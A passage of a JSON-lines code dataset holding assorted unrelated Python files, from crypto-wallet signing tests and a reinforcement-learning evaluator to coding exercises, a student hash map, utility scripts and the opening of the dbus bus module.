True)\n","sub_path":"1_challenge_npi_python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"548371020","text":"# Copyright (c) 2020, hukkinj1 (licensed under the MIT License)\n# Modifications Copyright (c) 2020, Foris Limited (licensed under the Apache License, Version 2.0)\n\nfrom unittest.mock import Mock\n\nfrom chainlibpy import Transaction, Wallet\n\n\ndef test_sign():\n unordered_sign_message = {\n \"chain_id\": \"tendermint_test\",\n \"account_number\": \"1\",\n \"fee\": {\"gas\": \"21906\", \"amount\": [{\"amount\": \"0\", \"denom\": \"\"}]},\n \"memo\": \"\",\n \"sequence\": \"0\",\n \"msgs\": [\n {\n \"type\": \"cosmos-sdk/Send\",\n \"value\": {\n \"inputs\": [\n {\n \"address\": \"tcro1qperwt9wrnkg5k9e5gzfgjppzpqhyav5j24d66\",\n \"coins\": [{\"amount\": \"1\", \"denom\": \"STAKE\"}],\n }\n ],\n \"outputs\": [\n {\n \"address\": \"tcro1yeckxz7tapz34kjwnjxvmxzurerquhtrmxmuxt\",\n \"coins\": [{\"amount\": \"1\", \"denom\": \"STAKE\"}],\n }\n ],\n },\n }\n ],\n }\n seed = \"dune car envelope chuckle elbow slight proud fury remove candy uphold puzzle call select sibling sport gadget please want vault glance verb damage gown\"\n wallet = Wallet(seed)\n dummy_num = 1337\n tx = Transaction(\n wallet=wallet,\n account_num=dummy_num,\n sequence=dummy_num,\n fee=dummy_num,\n gas=dummy_num,\n )\n tx._get_sign_message = Mock(return_value=unordered_sign_message) # type: ignore\n\n expected_signature = \"s2Yz6UjEpLJuNcyWn5E2adUu5Vn7gbKwrtyoBrQWEhUTomnxlASRnP/1GD/j1MD4PeJsNtE0MOjwOyFt8dU2cw==\"\n\n actual_signature = tx._sign()\n assert actual_signature == expected_signature\n\n\ndef test_get_pushable_tx():\n expected_pushable_tx = {\n \"tx\": {\n \"msg\": [\n {\n \"type\": \"cosmos-sdk/MsgSend\",\n \"value\": {\n \"from_address\": \"cro1u9q8mfpzhyv2s43js7l5qseapx5kt3g2rf7ppf\",\n \"to_address\": \"cro103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf\",\n \"amount\": [{\"denom\": \"basecro\", \"amount\": \"288000\"}],\n },\n }\n ],\n \"fee\": {\n \"gas\": \"30000\",\n \"amount\": [{\"amount\": \"100000\", \"denom\": \"basecro\"}],\n },\n \"memo\": \"\",\n \"signatures\": [\n {\n \"signature\": \"WjB3aB3k/nUK33iyGvbMPu55iiyCJBr7ooKQXwxE1BFAdBjJXIblp1aVPUjlr/blFAlHW7fLJct9zc/7ty8ZQA==\",\n \"pub_key\": {\n \"type\": \"tendermint/PubKeySecp256k1\",\n \"value\": \"AntL+UxMyJ9NZ9DGLp2v7a3dlSxiNXMaItyOXSRw8iYi\",\n },\n \"account_number\": \"11335\",\n \"sequence\": \"0\",\n }\n ],\n },\n \"mode\": \"sync\",\n }\n seed = \"dune car envelope chuckle elbow slight proud fury remove candy uphold puzzle call select sibling sport gadget please want vault glance verb damage gown\"\n wallet = Wallet(seed)\n fee = 100000\n _tx_total_cost = 388000\n amount = _tx_total_cost - fee\n\n tx = Transaction(\n wallet=wallet,\n account_num=11335,\n sequence=0,\n fee=fee,\n gas=30000,\n chain_id=\"test\",\n )\n tx.add_transfer(\n to_address=\"cro103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf\", amount=amount\n )\n pushable_tx = tx.get_pushable()\n assert pushable_tx == expected_pushable_tx\n","sub_path":"tests/test_transaction.py","file_name":"test_transaction.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"393706059","text":"\"\"\"\n@author: Viet Nguyen \nFrom: https://github.com/uvipen/Super-mario-bros-PPO-pytorch\n\nRe-implemented to use gym-retro by Gerardo Aragon-Camarasa\n\nModified for Benchmarking Reinforcement Learning Algorithms in NES Games by Erin-Louise Connolly\n\"\"\"\n\nimport csv\nimport os\nimport sys\nimport time\nfrom collections import deque\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom src.env import create_train_env\nfrom src.helpers import COMPLEX_MOVEMENT, RIGHT_ONLY, SIMPLE_MOVEMENT\nfrom src.model import PPO\n\n\ndef evaluate(opt, global_model, num_states, num_actions):\n torch.manual_seed(123)\n if opt.action_type == \"right\":\n actions = RIGHT_ONLY\n elif opt.action_type == \"simple\":\n actions = SIMPLE_MOVEMENT\n else:\n actions = COMPLEX_MOVEMENT\n\n savefile = opt.saved_path + '/pacman_PPO_test' + opt.timestr + '.csv'\n print(savefile)\n title = ['Steps', 'Time', 'TotalReward']\n with open(savefile, 'w', newline='') as sfile:\n writer = csv.writer(sfile)\n writer.writerow(title)\n\n env = create_train_env(opt.world,opt.stage,actions, mp_wrapper=False)\n local_model = PPO(num_states, num_actions)\n if torch.cuda.is_available():\n local_model.cuda()\n local_model.eval()\n\n state = torch.from_numpy(env.reset())\n if torch.cuda.is_available():\n state = state.cuda()\n \n done = True\n curr_step = 0\n tot_step = 0\n actions = deque(maxlen=opt.max_actions)\n tot_reward = 0\n while True:\n start_time = time.time()\n curr_step += 1\n tot_step += 1\n if done:\n local_model.load_state_dict(global_model.state_dict())\n\n logits, value = local_model(state)\n policy = F.softmax(logits, dim=1)\n action = torch.argmax(policy).item() # This selects the best action to take\n state, reward, done, info = env.step(action)\n tot_reward += reward\n env.render()\n actions.append(action)\n\n if actions.count(actions[0]) == actions.maxlen:\n done = True\n\n if done:\n ep_time = time.time() - start_time\n data = [tot_step, \"{:.4f}\".format(ep_time), \"{:.2f}\".format(tot_reward)]\n with open(savefile, 'a', newline='') as sfile:\n writer = csv.writer(sfile)\n writer.writerows([data])\n \n curr_step = 0\n tot_reward = 0\n actions.clear()\n state = env.reset()\n\n state = torch.from_numpy(state)\n if torch.cuda.is_available():\n state = state.cuda()\n","sub_path":"pacman/PPO/src/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"3333561","text":"from turtle import Turtle\nimport time\nimport random\nColors = [\"AliceBlue\", \"AntiqueWhite\", \"aquamarine\", \"azure\", \"beige\", \"bisque\", \"BlanchedAlmond\", \"blue\", \"BlueViolet\",\n \"brown\", \"burlywood\", \"CadetBlue\", \"chartreuse\", \"chocolate\", \"coral\", \"CornflowerBlue\", \"cornsilk\", \"cyan\"]\n\n\nclass NinjaTurtle(Turtle):\n # inherits from ^^ Turtle\n\n # This is the constructor. It's what's run whenever\n # you create a new ninja turtle\n def __init__(self, color, skill_level):\n # call parent class constructor\n # this sets up all the basic turtle stuff\n Turtle.__init__(self)\n\n # make standard turtle more ninja-like\n self.shape(\"turtle\")\n self.speed(\"fastest\")\n\n # set instance variables\n # (stuff that's unique to each ninja turtle)\n self.color(color)\n self.mad_skills = skill_level\n\n def loss(self):\n self.hideturtle()\n time.sleep(.1)\n self.showturtle()\n for _ in range(5):\n self.hideturtle()\n time.sleep(.3)\n self.right(random.randint(-180, 180))\n self.showturtle()\n time.sleep(.3)\n\n def victory_dance(self):\n time.sleep(1)\n self.setheading(90)\n self.forward(115)\n self.right(90)\n self.pendown()\n for i in range(18):\n for x in range(i):\n self.right(x / 2)\n self.pensize(x)\n self.forward(x)\n self.pencolor(random.choice(Colors))\n self.right(90)\n self.pensize(10)\n self.forward(220)\n self.hideturtle()\n","sub_path":"ninja_turtle.py","file_name":"ninja_turtle.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20532795","text":"import numpy as np\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.kernel_ridge import KernelRidge\n\ndef predict_degrees(x, y):\n \"\"\"\n predict how many degrees are represented by polynomial data\n \"\"\"\n x = x.reshape(-1, 1)\n params = {'degree': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]}\n model = KernelRidge(kernel = 'poly')\n classifier = GridSearchCV(model, params)\n classifier.fit(x, y)\n best_params = classifier.best_params_\n degree = best_params['degree']\n return degree\n\ndef predict_function(x, y, degree):\n x = x.reshape(x.shape[0], )\n poly = np.polyfit(x = x, y = y, deg = degree)\n string = 'Function: '\n total = degree\n for i in range(degree + 1):\n if round(poly[i], 2) != 0.:\n if len(string) == 10:\n string = string + \"{}*x^{}\".format(round(poly[i], 2), total)\n elif total == 0:\n string = string + \" + {}\".format(round(poly[i], 2))\n else:\n string = string + \" + {}*x^{}\".format(round(poly[i], 2), total)\n total -= 1\n return string\n \ndef print_function(x, y):\n x = np.array(x)\n y = np.array(y)\n degree = predict_degrees(x, y)\n string = predict_function(x, y, degree)\n return string\n\n\n#test it\nX_data = [-1.2, -0.01, 1.23, 1.8, 20, 21, 22, 23.1, 123]\ny_data = [526.8246347954033,\n 16.934384611296693,\n 34.90225474157847,\n 53.19035775656099,\n 1041679.9259436745,\n 1293754.150079261,\n 1588916.0855719403,\n 1968905.8269523252,\n 2121261427.2929053]\n\nprint(print_function(X_data, y_data)) #prints: Function: 9.87*x^4 + -75.4*x^3 + 169.14*x^2 + -97.05*x^1 + 16.03\n#the data above actually represents: π^2 x^4 - 24 π x^3 + 8 π x^2 + 144 x^2 - 97 x + 16\n","sub_path":"function_approximator.py","file_name":"function_approximator.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"574998334","text":"# '?' Matches any single character.\n# '*' Matches any sequence of characters (including the empty sequence).\n#\n# The matching should cover the entire input string (not partial).\n#\n# The function prototype should be:\n# bool isMatch(const char *s, const char *p)\nclass Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n DP = [[False for i in xrange(len(p)+1)] for j in xrange(len(s)+1)]\n DP[0][0] = True\n for i in xrange(1, len(s)+1):\n DP[i][0] = False\n for j in xrange(1, len(p)+1):\n if p[j-1] == '*':\n DP[0][j] = DP[0][j-1]\n\n for i in xrange(1, len(s)+1):\n for j in xrange(1, len(p)+1):\n if p[j-1] == s[i-1]:\n DP[i][j] = DP[i-1][j-1]\n elif p[j-1] == '?':\n DP[i][j] = DP[i-1][j-1]\n elif p[j-1] == '*':\n DP[i][j] = DP[i-1][j] or DP[i][j-1]\n\n return DP[len(s)][len(p)]\nn = Solution()\n# print n.isMatch(\"ppp\",\"pp\")\n# print n.isMatch(\"pzfasdn\",\"p*n\")\n# print n.isMatch(\"psa\",\"?sa\")\n# print n.isMatch(\"vvvv\",\"avv\")\nimport unittest\nclass Test_wildcardMatching(unittest.TestCase):\n def setUp(self):\n self.n = Solution()\n def test_matching(self):\n self.assertTrue(n.isMatch(\"\", \"\"), \"the pattern matches\")\n self.assertTrue(n.isMatch(\"pzfasdn\", \"p*n\"),\"the pattern matches\")\n self.assertTrue(n.isMatch(\"psa\", \"?sa\"), \"the pattern matches\")\n self.assertTrue(n.isMatch(\"paa\",\"paa\"),\"the pattern matches\")\n self.assertTrue(n.isMatch(\"\", \"*\"), \"the pattern matches\")\n self.assertTrue(n.isMatch(\"\", \"**\"), \"the pattern matches\")\n\n self.assertTrue(n.isMatch(\"a\", \"*?\"), \"the pattern matches\")\n def test_not_matching(self):\n self.assertFalse(n.isMatch(\"\", \"p*n\"), \"the pattern matches\")\n self.assertFalse(n.isMatch(\"\", \"*?\"), \"the pattern matches\")\n self.assertFalse(n.isMatch(\"pasdgsn\",\"p*d*b\"), \"the pattern doesn't match\")\n self.assertFalse(n.isMatch(\"assbof\",\"bas*\"),\"the pattern doesn't match\")\n self.assertFalse(n.isMatch(\"vvv\",\"?b?\"))\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"Companies/2sigma/wildCardMatchingSolution.py","file_name":"wildCardMatchingSolution.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"514095322","text":"from torch import nn\r\nimport torch\r\nimport numpy as np\r\nimport warnings\r\nimport cv2\r\ndef initialize_weights(*models):\r\n for model in models:\r\n real_init_weights(model)\r\n\r\n\r\ndef real_init_weights(m):\r\n\r\n if isinstance(m, list):\r\n for mini_m in m:\r\n real_init_weights(mini_m)\r\n else:\r\n if isinstance(m, nn.Conv2d): \r\n nn.init.kaiming_normal_(m.weight, nonlinearity='relu')\r\n if m.bias is not None:\r\n nn.init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.Linear):\r\n m.weight.data.normal_(0.0, std=0.01)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n nn.init.constant_(m.weight, 1)\r\n nn.init.constant_(m.bias, 0)\r\n elif isinstance(m,nn.Module):\r\n for mini_m in m.children():\r\n real_init_weights(mini_m)\r\n else:\r\n print( m )\r\n\r\ndef visualize_from_parsing_cls(cls,imsize,num=36):\r\n # imsize : (h,w)\r\n # cls : ch lanes\r\n # num = 36\r\n # warnings.warn('the number of classification num is fixed to {}'.format(num), UserWarning)\r\n h,w = imsize\r\n label = np.zeros(imsize)\r\n\r\n anchor_w = np.linspace(0,w,num + 1)[:-1]\r\n anchor_h = np.linspace(0,h,cls.shape[0]+1)[:-1]\r\n\r\n block_w = anchor_w[1] - anchor_w[0]\r\n block_h = anchor_h[1] - anchor_h[0]\r\n\r\n # ch lanes\r\n for i in range(cls.shape[1]):\r\n location = cls[:,i]\r\n for j,loc in enumerate(location):\r\n if loc == num:\r\n continue\r\n \r\n if j == len(location) - 1:\r\n h_end = label.shape[0]\r\n else:\r\n h_end = int(anchor_h[j+1])\r\n if loc == num - 1:\r\n w_end = label.shape[1]\r\n else:\r\n w_end = int(anchor_w[loc+1])\r\n label[int(anchor_h[j]):h_end,int(anchor_w[loc]):w_end] = i+1\r\n return label\r\n\r\ndef generate_seg_from_parsing_cls(cls,imsize,width,num=36):\r\n # num = 36\r\n # warnings.warn('the number of classification num is fixed to {}'.format(num), UserWarning)\r\n h,w = imsize\r\n \r\n\r\n anchor_w = np.linspace(0,w,num + 1)[:-1]\r\n anchor_h = np.linspace(0,h,cls.shape[0]+1)[:-1]\r\n\r\n block_w = anchor_w[1] - anchor_w[0]\r\n block_h = anchor_h[1] - anchor_h[0]\r\n label_all = []\r\n exists = []\r\n # ch lanes\r\n # import pdb;pdb.set_trace()\r\n \r\n for i in range(cls.shape[1]):\r\n label = np.zeros((h,w,3)).astype(np.uint8)\r\n location = cls[:,i]\r\n pts = []\r\n for j,loc in enumerate(location):\r\n if loc == num:\r\n continue\r\n pts.append((int(anchor_w[loc] + 0.5 * block_w),int(anchor_h[j])))\r\n \r\n # if j == len(location) - 1:\r\n # h_end = label.shape[0]\r\n # else:\r\n # h_end = int(anchor_h[j+1])\r\n # if loc == num - 1:\r\n # w_end = label.shape[1]\r\n # else:\r\n # w_end = int(anchor_w[loc+1])\r\n # label[int(anchor_h[j]):h_end,int(anchor_w[loc]):w_end] = i+1\r\n if len(pts) >= 2:\r\n exists.append(1)\r\n pre_pt = pts[0]\r\n for j in range(1,len(pts)):\r\n cv2.line(label,pre_pt,pts[j],(255,255,255),width)\r\n pre_pt = pts[j]\r\n else:\r\n exists.append(0)\r\n label_all.append(label)\r\n return label_all,exists","sub_path":"fix/nas_lane_seg/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"424381282","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"A `QueueRunner` that takes a feed function as an argument.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.python.framework import errors\nfrom tensorflow.python.platform import tf_logging as logging\nfrom tensorflow.python.training import queue_runner as qr\n\n\nclass FeedingQueueRunner(qr.QueueRunner):\n \"\"\"A queue runner that allows the feeding of values such as numpy arrays.\"\"\"\n\n def __init__(self, queue=None, enqueue_ops=None, close_op=None,\n cancel_op=None, feed_fn=None):\n \"\"\"Initialize the queue runner.\n\n For further documentation, see `queue_runner.py`. Note that\n `FeedingQueueRunner` does not support construction from protobuffer nor\n serialization to protobuffer.\n\n Args:\n queue: A `Queue`.\n enqueue_ops: List of enqueue ops to run in threads later.\n close_op: Op to close the queue. Pending enqueue ops are preserved.\n cancel_op: Op to close the queue and cancel pending enqueue ops.\n feed_fn: a function that returns a dictionary mapping fed `Tensor`s to\n values.\n \"\"\"\n super(FeedingQueueRunner, self).__init__(queue, enqueue_ops, close_op,\n cancel_op)\n self._feed_fn = feed_fn\n\n # pylint: disable=broad-except\n def _run(self, sess, enqueue_op, coord=None):\n \"\"\"Execute the enqueue op in a loop, close the queue in case of error.\n\n Args:\n sess: A `Session`.\n enqueue_op: The `Operation` to run.\n coord: Optional `Coordinator` object for reporting errors and checking\n for stop conditions.\n\n \"\"\"\n # TODO(jamieas): Reduce code duplication with `QueueRunner`.\n decremented = False\n try:\n while True:\n if coord and coord.should_stop():\n break\n try:\n feed_dict = None if self._feed_fn is None else self._feed_fn()\n sess.run(enqueue_op, feed_dict=feed_dict)\n except errors.OutOfRangeError:\n # This exception indicates that a queue was closed.\n with self._lock:\n self._runs -= 1\n decremented = True\n if self._runs == 0:\n try:\n sess.run(self._close_op)\n except Exception as e:\n # Intentionally ignore errors from close_op.\n logging.vlog(1, \"Ignored exception: %s\", str(e))\n return\n except Exception as e:\n # This catches all other exceptions.\n if coord:\n coord.request_stop(e)\n else:\n logging.error(\"Exception in QueueRunner: %s\", str(e))\n with self._lock:\n self._exceptions_raised.append(e)\n raise\n finally:\n # Make sure we account for all terminations: normal or errors.\n if not decremented:\n with self._lock:\n self._runs -= 1\n\n def _init_from_proto(self, queue_runner_def):\n raise NotImplementedError(\n \"{} does not support initialization from proto.\".format(type(\n self).__name__))\n\n def to_proto(self):\n raise NotImplementedError(\n \"{} does not support serialization to proto.\".format(type(\n self).__name__))\n","sub_path":"tensorflow/contrib/learn/python/learn/dataframe/queues/feeding_queue_runner.py","file_name":"feeding_queue_runner.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"599873577","text":"import sys\nimport signal\nimport logging\nfrom datetime import datetime\n\nfrom psycopg2.extensions import connection\nfrom elasticsearch.client import Elasticsearch\n\n\nclass TerminateProtected:\n def __init__(self, pg_conn: connection, es: Elasticsearch) -> None:\n self.pg_conn = pg_conn\n self.es = es\n self.killed = False\n\n def _handler(self, signum, frame):\n logging.info(\"End etl_app at %s\", datetime.now())\n self.pg_conn.close()\n logging.info(\"Postgres connection has been closed correctly\")\n self.es.transport.close()\n logging.info(\"Elasticsearch connection has been closed correctly\")\n self.killed = True\n\n def __enter__(self):\n self.old_sigint = signal.signal(signal.SIGINT, self._handler)\n self.old_sigterm = signal.signal(signal.SIGTERM, self._handler)\n\n def __exit__(self, type, value, traceback):\n if self.killed:\n sys.exit(0)\n signal.signal(signal.SIGINT, self.old_sigint)\n signal.signal(signal.SIGTERM, self.old_sigterm)\n","sub_path":"postgres_to_es/correct_terminate.py","file_name":"correct_terminate.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223290704","text":"s = input()\ntemp = s.split()\ndictionary = dict()\nfor i in range(len(s)):\n if s[i] not in dictionary:\n dictionary[s[i]] = 1\n else:\n dictionary[s[i]] += 1\n\noddLetter = 0\n\nfor i,j in dictionary.items():\n if (j % 2 != 0):\n oddLetter += 1\n\nif oddLetter <= 1:\n print(\"First\")\nelif (oddLetter % 2) == 0:\n print(\"Second\")\nelse:\n print(\"First\")\n","sub_path":"CodeForces/B. Little Girl and Game.py","file_name":"B. Little Girl and Game.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"136192984","text":"\"\"\"Valid Parenttheses: 1. order is correct; 2. brackets type should be matched.\"\"\"\ns = '([)]'\n\nstack = []\nmapping = {\")\": \"(\", \"]\": \"[\", \"}\": \"{\"}\nfor char in s:\n if char in mapping:\n top_ele = stack.pop() if stack else '#'\n if mapping[char] != top_ele:\n print(False)\n else:\n stack.append(char)\nprint(not stack)\n","sub_path":"Problem0020_ValidParentheses.py","file_name":"Problem0020_ValidParentheses.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"579779737","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\np = pd.DataFrame.from_csv('hormones.csv').reset_index().set_index('case')\nsix = p.loc[p.time == 6].drop('time', 1)\nnine = p.loc[p.time == 9].drop('time', 1)\n\nf, (a1, a2) = plt.subplots(1,2,sharey=True)\nsix.transpose().plot(kind='bar', ax=a1)\na1.set_title('6h')\nplt.sca(a1)\nplt.xticks(rotation=0)\n\nnine.transpose().plot(kind='bar', ax=a2)\na2.set_title('9h')\nplt.sca(a2)\nplt.xticks(rotation=0)\nplt.show()\n","sub_path":"hormones/hormone.py","file_name":"hormone.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"64356895","text":"import os\nimport shutil\n\npath = \"H:\\Music\\CloudMusic\";\nlistdir1 = os.listdir(path)\ni = len(listdir1)\nprint (i)\nfor j in range(i):\n print(listdir1[j])\n file = path + '\\\\' + listdir1[j]\n isdir = os.path.isdir(file)\n if isdir:\n childPath = os.listdir(file)\n len1 = len(childPath)\n for k in range(len1):\n result = file + '\\\\' + childPath[k]\n childFileName = path + '\\\\' + childPath[k]\n print (childFileName)\n os.rename(result, childFileName)\n if len1 == 0:\n os.removedirs(file)\n","sub_path":"fanli/379/379.py","file_name":"379.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"532831176","text":"#!/usr/bin/env python\n\nimport subprocess\nfrom rofi import Rofi\n\ndef main():\n r = Rofi('no-config')\n name = r.text_entry('Name for screenshot:')\n\n subprocess.check_output('scrot ' + str(name))\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"scripts/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"234271187","text":"# The purpose of this program is to set up a simple hash-map capable of simple storage and retrieval of words or phrases\n\nclass HashMap:\n map = [] # the map itself will be a list of lists\n buckets = 100 # specifies the number of buckets in the table when initialized\n\n # initializes hash-map as a list of empty lists in the quantity specified by self.buckets\n def __init__(self):\n # initialize map to a list of empty lists for use as buckets\n self.map = [[] for i in range(self.buckets)]\n\n # produces a repeatable hash code corresponding to an index in the hash-map outer list for use in searches\n def _hash_(self, term):\n hash_code = 0\n # the hash code used for this map is the sum of the uppercase ascii values of all characters in the string,\n # compressed into bucket quantity as in self.buckets - collisions will likely be common\n # hash code calculate\n for char in term.upper():\n hash_code += ord(char)\n return hash_code % self.buckets\n\n # private - conducts a search for a term in the hash-map, return binary True or False depending on if value is found\n def _search_(self, term):\n return term in self.map[self._hash_(term)]\n\n # public - conducts a search using _search_ and outputs a corresponding user message for a given search term\n def find(self, term):\n if self._search_(term):\n print(term + \" is a member\")\n else:\n print(term + \" is not a member\")\n\n # inserts a term into the appropriate bucket if term is not found in a search to prevent redundant entries\n def insert(self, term):\n if not self._search_(term):\n # then insert\n self.map[self._hash_(term)].insert(0, term.upper())\n\n # removes a term from its bucket if present\n def remove(self, term):\n if self._search_(term):\n # then remove\n self.map[self._hash_(term)].remove(term).upper()\n\n # prints all contents of all buckets to terminal\n def display(self):\n for i in range(self.buckets):\n print(str(i), end = \": \")\n for j in range(len(self.map[i])):\n print(self.map[i][j], end = \", \")\n print(\" \")\n\n# MAIN\n# band names will be the stored entries in the map as they require the utmost speed in searches\nband_list = [\"Wilco\", \"King Gizzard and the Lizard Wizard\", \"Death From Above 1979\", \"Ween\", \"Queens of the Stone Age\",\n \"The White Stripes\", \"Jack White\", \"The Raconteurs\", \"The Dead Weather\", \"The Hentchmen\", \"Royal Blood\",\n \"Twin Peaks\", \"Black Lips\", \"Ty Segall\", \"The Beatles\", \"Led Zeppelin\", \"Dr. Dog\", \"Parquet Courts\",\n \"The Chats\", \"The Flaming Lips\", \"Eagles of Death Metal\", \"Mac DeMarco\", \"Thee Oh Sees\", \"Arctic Monkeys\",\n \"Neutral Milk Hotel\", \"The Mars Volta\", \"Them Crooked Vultures\", \"IDLES\", \"Iggy Pop\", \"The Stooges\",\n \"Rancid\", \"Streetlight Manifesto\", \"Reel Big Fish\", \"Less Than Jake\", \"FIDLAR\", \"Wavves\", \"Daughters\",\n \"SWANS\", \"Death Grips\", \"Pink Floyd\", \"Gogol Bordello\", \"The Rolling Stones\", \"Gorillaz\", \"Babe Rainbow\",\n \"Amyl and the Sniffers\", \"Stonefield\", \"Bob Dylan\", \"Creedence Clearwater Revival\", \"Screeching Weasel\",\n \"David Bowie\", \"The Velvet Underground\", \"Father John Misty\", \"Desert Sessions\", \"Johnny Cash\"]\n\nbands = HashMap()\n\n# populate bands HashMap from band list\nfor i in range(len(band_list)):\n # uncomment the line below and delete the line above once your insertion function is finished\n bands.insert(band_list[i])\n\nbands.display()\n","sub_path":"Makeup_Assignment/nicole_hash_table.py","file_name":"nicole_hash_table.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"230760044","text":"#! /usr/bin/env python3\n#-*- coding: UTF-8 -*-\n\n### Legal\n#\n# Author: Thomas DEBESSE \n# License: ISC\n#\n\n\nimport sys\nfrom colorama import Fore, Style, init\n\n\n# keep an eye on the default Python's print function\n_print = print\n\nverbosely = False\n\n\ndef print(message):\n\tif sys.stdout.isatty():\n\t\tmessage = Fore.GREEN + message + Style.RESET_ALL\n\t_print(message)\n\n\ndef verbose(message):\n\tif verbosely:\n\t\tif sys.stdout.isatty():\n\t\t\tmessage = Style.DIM + message + Style.RESET_ALL\n\n\t\t_print(message)\n\n\ndef warning(message):\n\tmessage = \"Warning: \" + message\n\n\tif sys.stdout.isatty():\n\t\tmessage = Fore.YELLOW + message + Style.RESET_ALL\n\n\t_print(message)\n\n\ndef notice(message):\n\tmessage = \"Notice: \" + message\n\n\tif sys.stdout.isatty():\n\t\tmessage = Style.BRIGHT + message + Style.RESET_ALL\n\n\t_print(message)\n\n\ndef error(message, silent=False):\n\t_message = message\n\tmessage = \"Error: \" + message\n\n\tif sys.stdout.isatty():\n\t\tmessage = Fore.RED + message + Style.RESET_ALL\n\t_print(message)\n\n\tif silent:\n\t\traise SystemExit()\n\telse:\n\t\traise ValueError(_message)\n","sub_path":"Urcheon/Ui.py","file_name":"Ui.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"100646811","text":"\"\"\"Implementation for dbus.Bus. Not to be imported directly.\"\"\"\n\n# Copyright (C) 2003, 2004, 2005, 2006 Red Hat Inc. \n# Copyright (C) 2003 David Zeuthen\n# Copyright (C) 2004 Rob Taylor\n# Copyright (C) 2005, 2006 Collabora Ltd. \n#\n# SPDX-License-Identifier: MIT\n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use, copy,\n# modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nfrom __future__ import generators\n\n__all__ = ('Bus', 'SystemBus', 'SessionBus', 'StarterBus')\n__docformat__ = 'reStructuredText'\n\nfrom dbus.exceptions import DBusException\nfrom _dbus_bindings import (\n BUS_DAEMON_IFACE, BUS_DAEMON_NAME, BUS_DAEMON_PATH, BUS_SESSION,\n BUS_STARTER, BUS_SYSTEM, DBUS_START_REPLY_ALREADY_RUNNING,\n DBUS_START_REPLY_SUCCESS, validate_bus_name,\n validate_interface_name, validate_member_name, validate_object_path)\nfrom dbus.bus import BusConnection\nfrom dbus.lowlevel import SignalMessage\nfrom dbus._compat import is_py2\n\n\nclass 